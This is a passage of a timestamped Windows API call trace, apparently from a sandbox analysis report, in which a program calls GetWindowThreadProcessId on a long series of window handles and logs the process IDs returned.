	[0504.834] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.096] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x778
	[0506.096] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x778
	[0506.096] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.096] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.096] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.097] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.097] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.097] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.097] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.097] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.097] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x460
	[0506.097] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.097] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.097] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1664
	[0506.098] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x10b4
	[0506.098] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x10ac
	[0506.098] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x10ec
	[0506.098] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1068
	[0506.098] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x17e0
	[0506.098] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x102c
	[0506.098] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x17a4
	[0506.098] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1050
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1694
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1770
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1720
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x165c
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1578
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x16c0
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x161c
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1638
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x15c8
	[0506.099] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1554
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1674
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1520
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x14bc
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xf8c
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe9c
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1434
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x14ec
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xfcc
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x12ac
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1484
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x934
	[0506.100] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xc0c
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xb08
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x948
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1178
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x13e0
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xcd0
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x13fc
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xdc8
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xc18
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xc2c
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xa1c
	[0506.101] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1244
	[0506.102] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xdb0
	[0506.102] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1398
	[0506.102] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1358
	[0506.102] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1370
	[0506.102] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1340
	[0506.102] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x130c
	[0506.102] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x12c0
	[0506.102] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x12e4
	[0506.103] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1270
	[0506.103] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1298
	[0506.103] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x120c
	[0506.103] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x122c
	[0506.103] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x11c4
	[0506.103] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x11b0
	[0506.103] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1188
	[0506.103] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1148
	[0506.103] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1160
	[0506.104] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x10fc
	[0506.104] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe34
	[0506.104] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xea4
	[0506.104] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x514
	[0506.104] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe48
	[0506.104] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xbc8
	[0506.104] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xdf8
	[0506.104] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x318
	[0506.105] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xcac
	[0506.105] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x8bc
	[0506.105] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xf9c
	[0506.105] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xf48
	[0506.105] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe40
	[0506.105] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xecc
	[0506.105] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xeb8
	[0506.105] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe80
	[0506.106] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe98
	[0506.106] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe60
	[0506.106] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xee4
	[0506.106] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xf00
	[0506.106] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xdf0
	[0506.106] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xe1c
	[0506.106] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xdd0
	[0506.106] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xd94
	[0506.107] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xd74
	[0506.107] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xd00
	[0506.107] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xcd8
	[0506.107] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xc84
	[0506.107] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xca4
	[0506.107] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xc64
	[0506.107] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xc24
	[0506.107] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xb84
	[0506.108] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xbac
	[0506.108] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x384
	[0506.108] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xab8
	[0506.108] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x33c
	[0506.108] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xa44
	[0506.108] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xa64
	[0506.108] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x8a8
	[0506.109] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xaf0
	[0506.109] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x88c
	[0506.109] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xb04
	[0506.109] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x910
	[0506.109] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x230
	[0506.109] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xac0
	[0506.109] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xab4
	[0506.109] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xaac
	[0506.110] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x3d0
	[0506.110] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x978
	[0506.110] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xa7c
	[0506.110] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x59c
	[0506.110] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xa88
	[0506.110] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xa6c
	[0506.110] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xa68
	[0506.110] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x9f8
	[0506.111] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xa04
	[0506.111] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x924
	[0506.111] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x8dc
	[0506.111] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x7dc
	[0506.111] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x768
	[0506.111] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x764
	[0506.111] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x820
	[0506.111] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x810
	[0506.112] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x794
	[0506.112] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x83c
	[0506.112] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x7ac
	[0506.112] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xb44
	[0506.112] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xb5c
	[0506.112] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x838
	[0506.112] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.113] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.113] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.113] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.113] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.113] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.113] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.113] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.113] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x818
	[0506.113] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x5b8
	[0506.114] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x494
	[0506.115] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x1ec
	[0506.115] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x440
	[0506.115] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x7e8
	[0506.115] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x730
	[0506.115] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x2c8
	[0506.115] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x31c
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x330
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x128
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x5c8
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x6f8
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x358
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x73c
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0xb0
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x250
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x240
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x790
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x61c
	[0506.116] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x540
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x538
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x568
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x538
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x568
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x538
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x540
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x540
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x57c
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x460
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x554
	[0506.117] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x528
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x79c
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4e0
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x460
	[0506.118] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x460
